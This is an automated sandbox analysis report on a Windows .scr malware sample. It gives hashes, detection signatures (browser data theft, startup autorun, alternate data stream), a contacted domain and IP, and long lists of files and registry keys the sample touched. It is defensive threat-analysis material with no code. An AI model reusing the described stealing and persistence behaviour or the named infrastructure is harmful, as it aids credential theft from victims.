Analysis

Category Started Completed Duration
FILE 2014-05-03 09:09:10 2014-05-03 09:09:35 25 seconds

File Details

File Name report_7492740375439754.scr
File Size 19456 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 09cd9eb12effac3a5e9bcb83673d9807
SHA1 baad2cf8a7d25ffa752fccea7575b13009e19a12
SHA256 74f539fae25299555afbc1a090d639fe2eb5db123226cc4b39a27ae1e3a6278d
SHA512 8727344a5bde4e9d77bbbeda7c74a05c6e5dd99e67d89a047acbbdf6455cbd71f4426388cd242b95a89975729b0e0fd6b97c979f98ca5bd18874847dd3b23ae0
CRC32 8B8ED7A4
Ssdeep 192:gkNUhM5KAPWgLzfaWB27kOLd0R0XAsqSHrAdpA/4WBP82e1q92G:gkNDkPL40XAsBHrAdQ4WBP82wU2G
Yara None matched

Signatures

Starts servers listening on 0.0.0.0:0
File has been identified by at least one AntiVirus on VirusTotal as malicious
Performs some HTTP requests
Steals private information from local Internet browsers
Creates an Alternate Data Stream (ADS)
file: C:\DosDevices\A:
file: C:\DosDevices\B:
file: C:\DosDevices\C:
Installs itself for autorun at Windows startup

Screenshots


Hosts

IP
176.9.177.26

Domains

Domain IP
aflakbook.com 176.9.177.26

Summary

C:\WINDOWS\system32\msctfime.ime
C:\WINDOWS\win.ini
C:\DOCUME~1\User\LOCALS~1\Temp\report_7492740375439754.scr
C:\DOCUME~1\User\LOCALS~1\Temp\smcos.exe
PIPE\wkssvc
IDE#CdRomVBOX_CD-ROM_____________________________1.0_____#42562d3231303037333036372020202020202020#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
MountPointManager
STORAGE#Volume#1&30a96598&0&Signature32B832B7Offset7E00Length27F4DB200#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
C:\Documents and Settings
C:\Documents and Settings\User
C:\Documents and Settings\User\My Documents
C:\Documents and Settings\User\My Documents\desktop.ini
C:\Documents and Settings\All Users
C:\Documents and Settings\All Users\Documents
C:\Documents and Settings\All Users\Documents\desktop.ini
C:\Documents and Settings\User\Desktop
C:\Documents and Settings\All Users\Desktop
C:\PROGRA~1\MICROS~2\Office12\GRA8E1~1.DLL
C:\WINDOWS\Registration\R000000000007.clb
c:\docume~1\user\locals~1\temp\smcos.exe
C:\DOCUME~1
C:\DOCUME~1\User
C:\DOCUME~1\User\LOCALS~1
C:\DOCUME~1\User\LOCALS~1\Temp
C:\Documents and Settings\User\Local Settings\Temporary Internet Files
C:\Documents and Settings\User\Local Settings\History
C:\Documents and Settings\User\Local Settings\Temporary Internet Files\Content.IE5\
C:\
C:\Documents and Settings\User\Local Settings\Temporary Internet Files\Content.IE5\index.dat
C:\Documents and Settings\User\Cookies\
C:\Documents and Settings\User\Cookies\index.dat
C:\Documents and Settings\User\Local Settings\History\History.IE5\
C:\Documents and Settings\User\Local Settings\History\History.IE5\index.dat
PIPE\lsarpc
c:\autoexec.bat
C:\Documents and Settings\User\Local Settings
C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Connections\Pbk\*.pbk
C:\WINDOWS\system32\Ras\*.pbk
C:\Documents and Settings\User\Application Data\Microsoft\Network\Connections\Pbk\*.pbk
C:\DOCUME~1\User\LOCALS~1\Temp\tmpie.exe
c:\docume~1\user\locals~1\temp\tmpie.exe
C:\WINDOWS\_default.pif
C:\DosDevices\A:
C:\DosDevices\B:
C:\MSDOS.SYS
C:\IO.SYS
C:\WINDOWS\system32\ntio.sys
C:\WINDOWS\system32\ntdos.sys
C:\WINDOWS\SYSTEM32\CONFIG.NT
C:\WINDOWS\TEMP\scs3.tmp
C:\WINDOWS\TEMP\SCS3.TMP
C:\WINDOWS\SYSTEM32\HIMEM.SYS
C:\WINDOWS\SYSTEM32\COUNTRY.SYS
C:\DosDevices\C:
C:\WINDOWS\SYSTEM32\COMMAND.COM
C:\WINDOWS\SYSTEM32
C:\WINDOWS\SYSTEM32\AUTOEXEC.NT
C:\WINDOWS\TEMP\scs4.tmp
C:\WINDOWS\TEMP\SCS4.TMP
C:\Documents and Settings\User\Application Data
C:\Program Files
C:\Program Files\Common Files
MSCDEXNT.EXE
C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
REDIR">>>
C:\WINDOWS\SYSTEM32\REDIR.EXE
DOSX">>>
C:\WINDOWS\SYSTEM32\DOSX.EXE
C:\WINDOWS\SYSTEM.INI
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\IMM
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
HKEY_CURRENT_USER\SOFTWARE\Microsoft\CTF
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\SystemShared
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\report_7492740375439754.scr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ComputerName
ActiveComputerName
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
HKEY_CLASSES_ROOT\Drive\shellex\FolderExtensions
HKEY_CLASSES_ROOT\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe
HKEY_CLASSES_ROOT\.exe
HKEY_CLASSES_ROOT\exefile
HKEY_CLASSES_ROOT\exefile\CurVer
HKEY_CLASSES_ROOT\exefile\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_CLASSES_ROOT\exefile\\ShellEx\IconHandler
HKEY_CLASSES_ROOT\SystemFileAssociations\.exe
HKEY_CLASSES_ROOT\SystemFileAssociations\application
HKEY_CLASSES_ROOT\exefile\\Clsid
HKEY_CLASSES_ROOT\*
HKEY_CLASSES_ROOT\*\Clsid
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{475c7950-e3d2-11e0-8d7a-806d6172696f}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{475c7952-e3d2-11e0-8d7a-806d6172696f}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{475c7952-e3d2-11e0-8d7a-806d6172696f}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{475c7950-e3d2-11e0-8d7a-806d6172696f}\
HKEY_CLASSES_ROOT\Directory
HKEY_CLASSES_ROOT\Directory\CurVer
HKEY_CLASSES_ROOT\Directory\
HKEY_CLASSES_ROOT\Directory\\ShellEx\IconHandler
HKEY_CLASSES_ROOT\Directory\\Clsid
HKEY_CLASSES_ROOT\Folder
HKEY_CLASSES_ROOT\Folder\Clsid
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
HKEY_CLASSES_ROOT\CLSID\{AEB6717E-7E19-11D0-97EE-00C04FD91972}\InProcServer32
HKEY_CLASSES_ROOT\CLSID\{B5A7F190-DDA6-4420-B3BA-52453494E6CD}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Blocked
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Blocked
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\AppCompatibility
HKEY_LOCAL_MACHINE\Software\Microsoft\COM3
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004_Classes
HKEY_LOCAL_MACHINE\Software\Classes
\REGISTRY\USER
HKEY_LOCAL_MACHINE\Software\Classes\CLSID
CLSID\{B5A7F190-DDA6-4420-B3BA-52453494E6CD}
CLSID\{B5A7F190-DDA6-4420-B3BA-52453494E6CD}\TreatAs
\CLSID\{B5A7F190-DDA6-4420-B3BA-52453494E6CD}
\CLSID\{B5A7F190-DDA6-4420-B3BA-52453494E6CD}\InprocServer32
\CLSID\{B5A7F190-DDA6-4420-B3BA-52453494E6CD}\InprocServerX86
\CLSID\{B5A7F190-DDA6-4420-B3BA-52453494E6CD}\LocalServer32
\CLSID\{B5A7F190-DDA6-4420-B3BA-52453494E6CD}\InprocHandler32
\CLSID\{B5A7F190-DDA6-4420-B3BA-52453494E6CD}\InprocHandlerX86
\CLSID\{B5A7F190-DDA6-4420-B3BA-52453494E6CD}\LocalServer
HKEY_CLASSES_ROOT\CLSID\{B5A7F190-DDA6-4420-B3BA-52453494E6CD}
HKEY_CLASSES_ROOT\CLSID\{B5A7F190-DDA6-4420-B3BA-52453494E6CD}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{B5A7F190-DDA6-4420-B3BA-52453494E6CD}
CLSID\{FA2FAAC1-9316-48F3-A294-121FEEA80CEC}
CLSID\{FA2FAAC1-9316-48F3-A294-121FEEA80CEC}\TreatAs
\CLSID\{FA2FAAC1-9316-48F3-A294-121FEEA80CEC}
\CLSID\{FA2FAAC1-9316-48F3-A294-121FEEA80CEC}\InprocServer32
\CLSID\{FA2FAAC1-9316-48F3-A294-121FEEA80CEC}\InprocServerX86
\CLSID\{FA2FAAC1-9316-48F3-A294-121FEEA80CEC}\LocalServer32
\CLSID\{FA2FAAC1-9316-48F3-A294-121FEEA80CEC}\InprocHandler32
\CLSID\{FA2FAAC1-9316-48F3-A294-121FEEA80CEC}\InprocHandlerX86
\CLSID\{FA2FAAC1-9316-48F3-A294-121FEEA80CEC}\LocalServer
HKEY_CLASSES_ROOT\CLSID\{FA2FAAC1-9316-48F3-A294-121FEEA80CEC}
HKEY_CLASSES_ROOT\CLSID\{FA2FAAC1-9316-48F3-A294-121FEEA80CEC}\TreatAs
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\12.0\Groove
HKEY_CURRENT_USER\SOFTWARE\Groove Networks, Inc.\Groove
HKEY_LOCAL_MACHINE\SOFTWARE\Groove Networks, Inc.\Groove
HKEY_LOCAL_MACHINE\SOFTWARE\Groove.OldData
HKEY_CURRENT_USER\SOFTWARE\Groove.OldData
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\12.0\Groove\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\12.0\Groove
CLSID\{71C3BF7F-682F-4B5E-9E47-5C25D3AC9458}
CLSID\{71C3BF7F-682F-4B5E-9E47-5C25D3AC9458}\TreatAs
\CLSID\{71C3BF7F-682F-4B5E-9E47-5C25D3AC9458}
\CLSID\{71C3BF7F-682F-4B5E-9E47-5C25D3AC9458}\InprocServer32
\CLSID\{71C3BF7F-682F-4B5E-9E47-5C25D3AC9458}\InprocServerX86
\CLSID\{71C3BF7F-682F-4B5E-9E47-5C25D3AC9458}\LocalServer32
\CLSID\{71C3BF7F-682F-4B5E-9E47-5C25D3AC9458}\InprocHandler32
\CLSID\{71C3BF7F-682F-4B5E-9E47-5C25D3AC9458}\InprocHandlerX86
\CLSID\{71C3BF7F-682F-4B5E-9E47-5C25D3AC9458}\LocalServer
HKEY_CLASSES_ROOT\CLSID\{71C3BF7F-682F-4B5E-9E47-5C25D3AC9458}
HKEY_CLASSES_ROOT\CLSID\{71C3BF7F-682F-4B5E-9E47-5C25D3AC9458}\TreatAs
CLSID\{F5078F32-C551-11D3-89B9-0000F81FE221}
CLSID\{F5078F32-C551-11D3-89B9-0000F81FE221}\TreatAs
\CLSID\{F5078F32-C551-11D3-89B9-0000F81FE221}
\CLSID\{F5078F32-C551-11D3-89B9-0000F81FE221}\InprocServer32
\CLSID\{F5078F32-C551-11D3-89B9-0000F81FE221}\InprocServerX86
\CLSID\{F5078F32-C551-11D3-89B9-0000F81FE221}\LocalServer32
\CLSID\{F5078F32-C551-11D3-89B9-0000F81FE221}\InprocHandler32
\CLSID\{F5078F32-C551-11D3-89B9-0000F81FE221}\InprocHandlerX86
\CLSID\{F5078F32-C551-11D3-89B9-0000F81FE221}\LocalServer
HKEY_CLASSES_ROOT\CLSID\{F5078F32-C551-11D3-89B9-0000F81FE221}
HKEY_CLASSES_ROOT\CLSID\{F5078F32-C551-11D3-89B9-0000F81FE221}\TreatAs
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
HKEY_CLASSES_ROOT\.ade
HKEY_CLASSES_ROOT\.adp
HKEY_CLASSES_ROOT\.app
HKEY_CLASSES_ROOT\.asp
HKEY_CLASSES_ROOT\.bas
HKEY_CLASSES_ROOT\.bat
HKEY_CLASSES_ROOT\.cer
HKEY_CLASSES_ROOT\.chm
HKEY_CLASSES_ROOT\.cmd
HKEY_CLASSES_ROOT\.com
HKEY_CLASSES_ROOT\.cpl
HKEY_CLASSES_ROOT\.crt
HKEY_CLASSES_ROOT\.csh
CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}
CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\TreatAs
\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}
\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\InprocServer32
\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\InprocServerX86
\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\LocalServer32
\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\InprocHandler32
\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\InprocHandlerX86
\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\LocalServer
HKEY_CLASSES_ROOT\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}
HKEY_CLASSES_ROOT\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\TreatAs
HKEY_CLASSES_ROOT\CLSID\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\InProcServer32
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\Ranges\
HKEY_LOCAL_MACHINE\System\Setup
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\C\
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\*\
HKEY_CURRENT_USER\SOFTWARE\Classes\PROTOCOLS\Handler\C
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\C
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESPECT_OBJECTSAFETY_POLICY_KB905547
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
HKEY_CLASSES_ROOT\exefile\\shell\open
HKEY_CLASSES_ROOT\exefile\\shell\open\command
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\smcos.exe
HKEY_CLASSES_ROOT\exefile\\shell\open\ddeexec
HKEY_CLASSES_ROOT\Applications\smcos.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache
HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache\
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Path1
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Path2
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Path3
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Path4
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Special Paths
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013041020130411
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_AUTOPROXY_CACHE_ANAME_KB921400
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_TEMPORARYFILES_FOR_NOCACHE_840387
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_TEMPORARYFILES_FOR_NOCACHE_840386
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\RETRY_HEADERONLYPOST_ONCONNECTIONRESET
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CHUNK_TIMEOUT_KB914453
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CERT_TRUST_VERIFIED_KB936882
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BUFFERBREAKING_818408
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SKIP_POST_RETRY_ON_INTERNETWRITEFILE_KB895954
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENSURE_FQDN_FOR_NEGOTIATE_KB899417
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_DISABLE_NTLM_PREAUTH_IF_ABORTED_KB902409
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PERMIT_CACHE_FOR_AUTHENTICATED_FTP_KB910274
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WPAD_STORE_URL_AS_FQDN_KB903926
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_CNAME_FOR_SPN_KB911149
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_KEEP_CACHE_INDEX_OPEN_KB899342
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WAIT_TIME_THREAD_TERMINATE_KB886801
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_FIX_CHUNKED_PROXY_SCRIPT_DOWNLOAD_KB843289
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Http Filters\RPA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Http Filters\RPA
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Blocked\FEATURE_INCLUDE_PORT_IN_SPN_KB908209
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing
HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\RASAPI32
HKEY_USERS\Software\Microsoft\windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Environment
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Volatile Environment
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_USERS\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_VALIDATE_URLHOSTNAME
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\Domains\aflakbook.com
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\aflakbook.com
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\ProtocolDefaults\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\smcos.exe
\CurVer
\ShellEx\IconHandler
